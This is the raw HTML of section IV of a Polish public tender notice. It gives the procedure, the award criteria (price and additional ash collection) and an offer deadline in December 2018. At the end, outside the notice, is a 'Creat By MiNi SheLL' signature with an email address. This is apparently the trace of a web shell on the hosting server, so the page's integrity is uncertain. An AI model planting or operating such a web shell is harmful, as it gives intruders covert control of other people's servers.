left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Dodatkowy odbiór popiołu</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-03</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com